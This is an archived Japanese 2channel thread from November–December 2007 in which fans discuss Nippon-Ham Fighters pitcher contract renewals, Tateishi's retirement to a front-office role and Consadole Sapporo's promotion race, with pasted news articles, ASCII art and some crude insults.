2年目の今年は終盤息切れしてしまったのを見てそう思った

101 :代打名無し:2007/11/25(日) 16:18:16 ID:VTH6QQ7U0
松浦が15勝で最多勝なってた頃が懐かしいな。今頃どうしてんだろ。と思ってたらこんなとこにいた。
http://homebase.seesaa.net/article/68148883.html

102 :権平 ◆vGzK94OFlQ :2007/11/26(月) 18:59:46 ID:UdBTNyHT0
トレンディエースと言われていた人だね。

103 :代打名無し@実況は実況板で:2007/11/26(月) 22:44:56 ID:OV7lnXjF0


104 :代打名無し@実況は実況板で:2007/11/27(火) 14:45:37 ID:k+lpbzX00
そういえば、納会に立石が出席してたみたいだね。
スタッフとして残ってくれるのかな〜

105 :代打名無し@実況は実況板で:2007/11/27(火) 15:27:51 ID:ZfuiRHc00
>>104
トライアウト駄目だったら球団職員として残るとか聞いた気がする。

鎌倉駄目だったか・・・無念。

106 :代打名無し@実況は実況板で:2007/11/27(火) 15:31:37 ID:ZfuiRHc00
そういえば畳も今日出てなかったようだな。

107 :権平 ◆vGzK94OFlQ :2007/11/27(火) 18:50:27 ID:KzFsfbnI0
立石は経験積めばコーチとかできる気がするな。

108 :代打名無し@実況は実況板で:2007/11/27(火) 19:22:08 ID:UMrOJtng0
>>107
既に吉井よりコーチっぽく見える

109 :代打名無し@実況は実況板で:2007/11/27(火) 19:30:58 ID:uTMYFjqk0
ってか吉井がコーチってのがそもそも場違い

110 :代打名無し@実況は実況板で:2007/11/27(火) 19:40:16 ID:2Im4N1P/0
立石なんかより吉井のほうがコーチに向いてるのは明らか
まず経験の差が違う
吉井はメジャー、セリーグ、パリーグとプロとして23年も経験している
一方立石は特にこれといった取りえはない

111 :代打名無し@実況は実況板で:2007/11/27(火) 20:20:43 ID:PK3fCvMi0
         _,r'´::::::::::::::::::::::::::`'、.      /  入 遠 ほ
        {::::::::rr-‐-‐'^i::::::::::::::i.     !   れ 慮  ら
         ゙l'´゙《   __,,,ゝ:::r、:::::l     |   て  し
         ト=r;、 ゙"rィァ‐リメ }:::::}    ヽ  み .な
          ゙i`"l   ̄    ソ::::ヽ    l′ ろ  い
          ゙i. ゝ^   ,  /ヾヾヾ、   ヽ,  よ  で
           ヽ ゙こ´  /     ヽ、   ∠_
            ヽ、  /__,∠、    `'-、   ^ー――
             `゙ク'゙´   `    ゙'、 ヽ
              /           〉 ヽヽ
            ィ               ヽヽ
         _,,-'´:::                 ゙i
        /    `                  }
      /         ,-ィ‐r'´´      /   l
   __r'〈      ,ノ   / ```l       /     l
-‐ ´      ‐ '' ´  /l:::    l     ー'´      l




112 :代打名無し@実況は実況板で:2007/11/27(火) 20:21:30 ID:PK3fCvMi0
┏━━━━━━━━━━━┓                                  ┏━━┓
┃                      ┃                                      ┃    ┃
┗━━━━┓  ┏━━┓  ┃                                      ┃    ┃
          ┃  ┃    ┃  ┃                                      ┃    ┃
          ┃  ┃┏━┛  ┃                                      ┃    ┃
          ┃  ┃┃      ┃            ┏━━━━━━━━━━┓  ┃    ┃
          ┃  ┃┗━━━┛┏┳┓┏━┓┃                    ┃  ┃    ┃
          ┃  ┃         ┃┃┃┃  ┃┗━━━━━━━━━━┛  ┃    ┃
          ┃  ┃          ┗┻┛┃  ┃                          ┗━━┛
          ┃  ┃          ┏━━┛  ┃                          ┏━━┓
          ┃  ┃          ┃        ┃                          ┃    ┃
          ┗━┛          ┗━━━━┛                          ┗━━┛

113 :代打名無し@実況は実況板で:2007/11/27(火) 20:24:53 ID:NMcQj/400
>>109-110
どっちもコーチ経験ゼロだし実際見てみないと分からない

114 :代打名無し@実況は実況板で:2007/11/28(水) 01:05:10 ID:EOlEL/3o0
>>107
なんで?

115 :代打名無し@実況は実況板で:2007/11/28(水) 06:46:40 ID:W/imzIZ50
>>114
そりゃスープカレーの美味い店をコーチするのよ

116 :代打名無し@実況は実況板で:2007/11/28(水) 09:40:05 ID:m2K9VFkI0
日本ハム立石が現役引退、球団職員へ
http://hokkaido.nikkansports.com/baseball/professional/fighters/p-hf-tp0-20071128-288666.html

117 :代打名無し@実況は実況板で:2007/11/28(水) 14:31:40 ID:eIBTbCbA0
球団職員の立場を利用して自分の名でスープカレーを販売して欲しい

118 :代打名無し@実況は実況板で:2007/11/28(水) 18:54:25 ID:BNniWVqr0
吉川   600→1500
山本  1200→1200
金森   550→ 900
歌さん 2200→2000

ttp://hokkaido.nikkansports.com/baseball/professional/fighters/f-hf-tp0-20071128-288885.html
ttp://www.jiji.com/jc/c?g=spo_30&k=2007112800808

119 :権平 ◆vGzK94OFlQ :2007/11/28(水) 19:25:24 ID:EtQuEcmV0
>>114
日本ハム一筋だし若手に好かれている印象がある。
二軍投手コーチにはなれるんじゃないかな。

120 :代打名無し@実況は実況板で:2007/11/28(水) 20:14:34 ID:3HX7Riyy0
J2札幌昇格決定戦におひちょり様招待!

コンサドーレ札幌が日本ハムの森本稀哲外野手(26)を12月1日の最終節ホーム水戸戦
に招待するプランが26日、浮上した。森本が25日のファンフェスティバルで、親交のある
MF砂川誠(30)から借りた札幌のユニホーム姿で登場したことにクラブ側が感激。
同じ札幌ドームを本拠地とするチームを代表する選手からのエールに対し、水戸戦で
J1昇格決定の瞬間を生観戦してもらおうと検討している。

札幌の大一番に心強いサポーター? が加わるかもしれない。日本ハム森本が
25日のファンフェスティバルで赤黒のユニホーム姿を披露したことを受け、クラブ
関係者は26日、「(12月1日の水戸戦に)来てくれるなら、招待したいですね」と
笑顔でプランを明かした。日本ハムと札幌の事務所が隣り合わせということもあり、
球団を通じてチケットを贈ることになりそうだ。

数々のパフォーマンスでファンを沸かせてきた森本が、また周囲を驚かせたのが
ファンフェスティバルだった。背番号8の砂川のユニホーム姿でPK合戦などに参加。
「次は(札幌が昇格を)決めてくれるでしょう」とエールを送り、「お互い盛り上げて
いきたい」と高らかに共闘を宣言した。

クラブ側は一夜明けた26日、敏感に反応した。日本ハムのファン4万人の前で
札幌を“宣伝”してくれたことに対し「ありがたかった。多くの人の前で着てくれ、
盛り上げてくれるのに一役買ってくれた」とクラブ関係者。これまでも日本ハム
の稲葉や武田久らが札幌の試合を観戦するなど交流があり、チーム間でも
共通チケット発売などで協力してきた。そんな共存共栄を象徴するような森本
のパフォーマンスが、うれしかった。

水戸戦は勝つか、引き分けでJ1昇格が決まり、敗れれば3位転落の可能性も
ある大一番。チケットの前売り状況は26日時点で約1万9500枚と、今季最多
3万2599人を集めた18日京都戦を上回るペースになっている。サポーターの
大声援に人気者の「ひちょり」が加われば、場内がより盛り上がるのは間違いない。

http://hokkaido.nikkansports.com/soccer/jleague/consadole/p-hc-tp0-20071127-288276.html

121 :代打名無し@実況は実況板で:2007/11/28(水) 21:27:08 ID:W/imzIZ50
歌藤の背番号がオリ時代と同じ12に戻りまっせ

122 :代打名無し@実況は実況板で:2007/11/28(水) 22:38:37 ID:1Un6+2oe0
>>118
携帯公式より
11月28日
歌藤・金澤・吉川・山本・金森・伊藤 投手6人全員更改

123 :代打名無し@実況は実況板で:2007/11/28(水) 23:40:23 ID:PlVLh/lw0
ホモ氏ね

124 :代打名無し@実況は実況板で:2007/11/28(水) 23:46:36 ID:Cu66U8YPO
うま味紳士

125 :代打名無し@実況は実況板で:2007/11/29(木) 01:45:13 ID:By+JRTWH0
>>122
この辺りの選手は、まとめてポンって感じですな。

126 :代打名無し@実況は実況板で:2007/11/29(木) 02:58:29 ID:aypDHc6i0
まあ、来期は八木も復活するだろうし、左の先発はなんとかなるんじゃないかな。
元々今期もそこまで打たれてるわけではないし。自滅の多杉が減ればな・・・・。

127 :権平 ◆vGzK94OFlQ :2007/11/29(木) 18:42:00 ID:mPoqUDtH0
>>118
吉川が予想外に大幅アップで驚いた


128 :代打名無し@実況は実況板で:2007/11/29(木) 19:32:34 ID:kdkj+vqB0
29日契約更改

建山 6000→4800
押本 2400→2700
橋本 更改・金額は不明

ソースは
ttp://www.daily.co.jp/newsflash/2007/11/29/0000754250.shtml
及び北海道のローカルTV・公式携帯

129 :代打名無し@実況は実況板で:2007/11/29(木) 19:34:06 ID:kdkj+vqB0
>>127
巷では「たったの1500万か」が多数。

130 :代打名無し@実況は実況板で:2007/11/29(木) 19:39:01 ID:kdkj+vqB0
>>128の追加情報。
橋本 1800→1600
ttp://www.jiji.com/jc/c?g=spo_30&k=2007112900929

131 :代打名無し@実況は実況板で:2007/11/29(木) 20:09:59 ID:D+DhtRKU0
でつ 60万$(約6600)→40万$(約4400) ※1年契約
ttp://www.jiji.com/jc/c?g=spo_date1&k=2007112900963

132 :代打名無し@実況は実況板で:2007/11/29(木) 21:15:34 ID:5hjA6NJt0
シーズン前の予想w

237 :代打名無し@実況は実況板で :2007/02/13(火) 09:39:26 ID:Vsi4tjrp0
占い師に聞く今期予想

期待以上の活躍→グリン、宮本
期待通りの活躍→八木
終わってみれば活躍→ダルビッシュ、金村、須永、武田久、武田勝、建山
微妙な活躍 →清水、江尻
一瞬だけ活躍→鎌倉、正田
不調    →立石、伊藤、マイケル中村
期待はずれ →スウィーニー
調子はいいんだけれど活躍するかどうかは不明→糸数


当たってるのはグリン・久・江尻・立石・伊藤・糸数ぐらいか

133 :代打名無し@実況は実況板で:2007/11/29(木) 21:40:06 ID:KyDzKutG0
前スレで押本は上がってスウィーニーは下がると予想して叩かれた俺が来ましたよ。

134 :代打名無し@実況は実況板で:2007/11/29(木) 21:57:42 ID:d2prE+Tf0
うん、それで?

135 :代打名無し@実況は実況板で:2007/11/29(木) 22:11:19 ID:za71IALg0
>>133
二連覇甘甘査定と江尻来季絶望がなかったら、押本は微減だっただろうな。
それを見越して予想したんだったら褒めてつかわすw

でつはよく残ってくれたよなぁ・・・普通なら怒って帰っちゃうぞ。

136 :代打名無し@実況は実況板で:2007/11/30(金) 00:26:32 ID:Imq81WH50
J2札幌三浦監督が水戸を「大変な相手」

12月1日の最終節ホーム水戸戦に引き分け以上でJ1昇格が
決まるコンサドーレ札幌は29日、札幌・宮の沢で練習した。
12位に低迷する水戸が相手とはいえ、28日の天皇杯では
J2・10位の愛媛が浦和に快勝した。三浦監督は「往々にして
そういうことは起こる。サッカーに絶対はない。大変な相手です」
と気を引き締めた。

http://hokkaido.nikkansports.com/soccer/jleague/consadole/f-hc-tp0-20071129-289254.html

137 :代打名無し@実況は実況板で:2007/11/30(金) 00:45:22 ID:zEs2LYaL0
押本に

138 :代打名無し@実況は実況板で:2007/11/30(金) 00:47:41 ID:zEs2LYaL0
押されっぱなし

139 :代打名無し@実況は実況板で:2007/11/30(金) 03:50:11 ID:urRr8Cam0
あと未更改の投手はダル・W武田・八木の4人か?
中村泰もまだか?

140 :代打名無し@実況は実況板で:2007/11/30(金) 05:40:05 ID:+8q6YsrY0
外人と日本人は査定が違うのか知らんが
建山6000→4800
スウィーニー6600→4400
じゃスウィーニーが可哀想な気が。
現状維持か微減くらいかと思ったが、解雇と残留のボーダーくらいの評価だったのかな
その分活躍すれば一気にあがるのかな。

141 :代打名無し@実況は実況板で:2007/11/30(金) 07:34:23 ID:MY/rqCIVO
小笠原の分の浮いた5億で下柳獲ってくれ!3億複数年ならきてくれるだろう。下柳いれば中継の負担がかなり軽減されるはず。

142 :代打名無し@実況は実況板で:2007/11/30(金) 07:47:30 ID:JX29JcyLO
下柳なら単年3500万円でしょう

143 :代打名無し@実況は実況板で:2007/11/30(金) 07:55:51 ID:ykfFSw+xO
来年の投手の顔はダルビッシュと兄貴アナル多田野だぜ!

144 :代打名無し@実況は実況板で:2007/11/30(金) 12:29:39 ID:EHHqmyeJ0
ttp://www.sponichi.co.jp/hokkaido/news/2007/11/30/05.html

今年伊藤の久とのダブルセットアッパー構想が崩れたから、来年は押本でいくのか?
個人的には金森期待だが。

145 :代打名無し@実況は実況板で:2007/11/30(金) 12:31:36 ID:EHHqmyeJ0
>>140
でつは出来高別じゃないかな?

146 :代打名無し@実況は実況板で:2007/11/30(金) 18:10:11 ID:2SZWQy+y0
>>140
スウィーニーは普通で建山が激甘だな
貢献度はスウィーニー未満だというのに

147 :代打名無し@実況は実況板で:2007/11/30(金) 18:23:34 ID:AJuHYpKE0
タテヤマンは実績があるからかな

148 :権平 ◆vGzK94OFlQ :2007/11/30(金) 18:45:52 ID:cynPO9xk0
>>132
このレスを見たときエースダルが・・・微妙だなと思ったけど
とんでもなかったな・・・

149 :代打名無し@実況は実況板で:2007/11/30(金) 21:47:59 ID:si4Nhczc0
 。  .   . 。 。゚. 。* 。, ´。.  ☆。。. ゚。+ 。 .。  .  。   .
  .   。  ゚ ゚。 。, /::::;;;:::::::::::::::;;:;_;;ィ''´    ヾ::::ヽ .。o ☆ + ,゚。 *。. 。 。 .    。    .
 ゚ .゚ ゚  。゚ + 。. + {::::::::::::::::::::::::;/     ‐-‐ `、:::}。 * 。゚。゚., ,+ 。゚. 。 . .   ,    ,   .
゚。゚+゚`, o。。.゚*。゚ 。.゚ .{:::::::::::::::::::::::',;   ,.===,  ,.= y'。 ☆+。。゚. ° 。 .   ,      ゚    ゚
 。, .゚。 + ☆。,゚. o  ',::::::::::::::::::::::ゝ  =tテ   (=tテ   。 。+ 。゚.,  . ゚   ,   。     。   .   .
゚` .゚ .゚. ゚. . ゚  .  ゚ 'r⌒t、::::::/    =-‐  ヽー、   ゚. o * 。゚。゚.。゚。+゚ 。 。 ゚。 ゚ 。  ゚
            .  { ∂; ` 、」       ,    )   .   , .  .   。      ゚ .
 .  .     . ,    ヽ ヽ   ゙ ..,,,..  ゛^ ‐´/   。           .  , 
おみやげ          `tイ、      ー==‐l            
  ν            /l "'‐ ,,     ⌒ /
  _, ._            /::::/ヽ、     ...,,,_/- ..,____
(‘_‘♪) キコキコ ヽ.  イ::::::::ヽ 丶     /l::::::::::::::::::"' /
 U┬ / )□〜〜(二二二二二二二二二二二二二)/)
 ◎└<−◎    (◎))                  ◎)


150 :代打名無し@実況は実況板で:2007/11/30(金) 22:04:47 ID:UqBErjst0
ごべまスレから持ってきたのかww

151 :代打名無し@実況は実況板で:2007/11/30(金) 22:14:09 ID:+8q6YsrY0
>>147
実績あってもその年駄目だった奴(特にベテラン)は大減俸くらうぞ。
公傷認定や複数年契約でもない限り。

まあ、逆に来年2人が同じ成績くらいで活躍すれば、
スウィーニーの方が一気に上がるのかな

今年に関しては、しいて言えば日シリの登板内容が多少考慮されてる可能性はあるが。

152 :代打名無し@実況は実況板で:2007/11/30(金) 23:09:46 ID:PDSjZ0O70
J2札幌が“最悪”想定し超攻撃布陣練習

選手を集めて指示を出す札幌三浦監督  “やり残し”はしたくない。
コンサドーレ札幌三浦俊也監督(44)は29日、12月1日の水戸戦で追いかける
展開となる最悪の事態も想定し、札幌・宮の沢でパワープレーの練習を行った。
劣勢になるというネガティブな想定に目を背けるのではなく、あらゆる準備を済ませておく。

紅白戦も中盤をすぎたころ、DF曽田が前線に上がった。中盤もボランチは
MF芳賀1枚となり、MF西谷、西、岡本の超攻撃的布陣。相手ボールをDFライン
で奪うと、高さのある曽田、FWダビ目掛けてロングボールを放り込む。三浦監督は
「今までやったことなかったから。考え方(の統一)ですね。日本の選手は
『練習でやっていないから』と言っちゃうから」。ビハインドになった場合に、
やるべきことをしっかりと意思統一していることが大事になる。中盤での
不用意なパスには「アホか、おまえら!」と容赦ない怒号が響いた。

万が一先制されてもパニックにならないための準備だ。DF西嶋は
「もう戦術うんぬんじゃないですからね」と言う。J1昇格という大目標
に向かって、どんな状況でも自分たちのサッカーを見失わない。

http://hokkaido.nikkansports.com/soccer/jleague/consadole/p-hc-tp0-20071130-289470.html

153 : 【大吉】 :2007/12/01(土) 01:45:27 ID:AUlL1o3Y0
今月のマモノ

154 ::2007/12/01(土) 01:46:07 ID:AUlL1o3Y0
すまん、誤爆

155 :代打名無し@実況は実況板で:2007/12/01(土) 09:29:51 ID:vViCqJ1/O
下柳獲らないフロントは糞だな。3億5千万×3年でオフはごねないように上げ下げなしの条件ならきてもらえるだろうし。先発もロングも敗戦処理もできるから中継ぎ3人分の働きがあるのに。

156 :代打名無し@実況は実況板で:2007/12/01(土) 10:05:45 ID:hk2KWLZK0
>>155
ハムにいた頃とは違うと思う。
おっさんになってるし、連投はきついだろ。

157 :代打名無し@実況は実況板で:2007/12/01(土) 11:05:14 ID:7qpMz9vs0
>>155
もともと、フロントはくそだから、とるわけないだろ。


158 :代打名無し@実況は実況板で:2007/12/01(土) 12:29:21 ID:VBqqMnUK0
>>155
お前、以前自転車転倒で再起不能になった某投手をやたら推してた例の携帯厨だろ?
可哀想だから一回だけマジレスしてやるw
  ↓
212 :代打名無し@実況は実況板で :2007/12/01(土) 10:22:30 ID:LiKUjUvs0
国内外問わず下柳欲しがる球団なんてあるの?

214 :代打名無し@実況は実況板で :2007/12/01(土) 10:36:40 ID:PJQKW5Ll0
>>212
阪神だが8000万でも要りません。

159 :代打名無し@実況は実況板で:2007/12/01(土) 14:24:37 ID:ENAgfdYt0
先発、ロング、敗戦処理の便利屋なら多田野でいいじゃん
どうせ傷物なんだから、いいように使い回せばいいんだよ
それで文句言われる筋合いもないだろ


160 :代打名無し@実況は実況板で:2007/12/01(土) 15:09:00 ID:7qpMz9vs0
>>159
そのつもりで指名したんだろうな

161 :代打名無し@実況は実況板で:2007/12/02(日) 00:48:51 ID:NMG2+NHDO
リーグ別1点差以内時被安打ランキング
1ダルビッシュ(日).164
2グリン(日).206
3武田勝(日).207

162 :代打名無し@実況は実況板で:2007/12/02(日) 01:20:31 ID:xhinRPR30
札幌三浦監督「選手に感謝したい」/J2
http://hokkaido.nikkansports.com/soccer/jleague/consadole/f-hc-tp0-20071201-290239.html

163 :権平 ◆vGzK94OFlQ :2007/12/03(月) 20:19:39 ID:CupHEclU0
>>161
投手陣の粘り強さで優勝できたようなもんだな。

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)